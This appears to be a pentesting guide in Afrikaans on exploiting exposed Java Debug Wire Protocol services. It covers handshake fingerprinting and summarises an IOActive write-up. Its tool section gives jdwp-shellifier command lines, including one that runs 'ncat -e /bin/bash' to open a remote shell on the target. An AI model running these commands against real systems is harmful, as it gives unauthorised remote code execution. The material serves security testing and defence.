Pentesting JDWP - Java Debug Wire Protocol

Reading time: 4 minutes

Exploiting

JDWP-uitbuiting hang af van die protokol se gebrek aan outentisering en versleuteling. Dit word algemeen op poort 8000 gevind, maar ander poorte is moontlik. Die aanvanklike verbinding word gemaak deur 'n "JDWP-Handshake" na die teikenpoort te stuur. As 'n JDWP-diens aktief is, antwoord dit met dieselfde string, wat sy teenwoordigheid bevestig. Hierdie handshake dien as 'n vingerafdrukmetode om JDWP-dienste op die netwerk te identifiseer.

In terme van prosesidentifikasie, kan die soek van die string "jdwk" in Java-prosesse 'n aktiewe JDWP-sessie aandui.

Die gereedskap van keuse is jdwp-shellifier. Jy kan dit met verskillende parameters gebruik:

./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept

Ek het gevind dat die gebruik van --break-on 'java.lang.String.indexOf' die uitbuiting meer stabiel maak. En as jy die kans het om 'n backdoor na die gasheer op te laai en dit uit te voer in plaas van om 'n opdrag uit te voer, sal die uitbuiting selfs meer stabiel wees.

Meer besonderhede

Dit is 'n opsomming van https://ioactive.com/hacking-java-debug-wire-protocol-or-how/. Kyk daarna vir verdere besonderhede.

1. JDWP Oorsig:

• Dit is 'n pakkie-gebaseerde netwerk-binary protokol, hoofsaaklik sinchronies.
• Dit ontbreek outentisering en versleuteling, wat dit kwesbaar maak wanneer dit aan vyandige netwerke blootgestel word.

2. JDWP Handdruk:

• 'n Eenvoudige handdrukproses word gebruik om kommunikasie te begin. 'n 14-karakter ASCII-string “JDWP-Handshake” word tussen die Debugger (klient) en die Debuggee (bediener) uitgewissel.

3. JDWP Kommunikasie:

• Boodskappe het 'n eenvoudige struktuur met velde soos Lengte, Id, Vlag, en CommandSet.
• CommandSet waardes wissel van 0x40 tot 0x80, wat verskillende aksies en gebeurtenisse verteenwoordig.

4. Uitbuiting:

• JDWP laat die laai en aanroep van arbitrêre klasse en bytecode toe, wat sekuriteitsrisiko's inhou.
• Die artikel beskryf 'n uitbuitingsproses in vyf stappe, wat die verkryging van Java Runtime verwysings, die instelling van breekpunte, en die aanroep van metodes insluit.

5. Regte Lewe Uitbuiting:

• Ten spyte van potensiële firewall beskerming, is JDWP dienste ontdekbaar en uitbuitbaar in werklike scenario's, soos gedemonstreer deur soektogte op platforms soos ShodanHQ en GitHub.
• Die uitbuitingskrip is teen verskeie JDK weergawes getoets en is platform-onafhanklik, wat betroubare Remote Code Execution (RCE) bied.

6. Sekuriteitsimplikasies:

• Die teenwoordigheid van oop JDWP dienste op die internet beklemtoon die behoefte aan gereelde sekuriteitshersienings, die deaktivering van debug funksies in produksie, en behoorlike firewall konfigurasies.

Verwysings:

• [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/]
• https://github.com/IOActive/jdwp-shellifier
• http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html
• http://www.secdev.org/projects/scapy(no longer active)
• http://www.shodanhq.com/search?q=JDWP-HANDSHAKE
• http://www.hsc-news.com/archives/2013/000109.html (no longer active)
• http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt
• https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
• http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
• http://nmap.org/nsedoc/scripts/jdwp-exec.html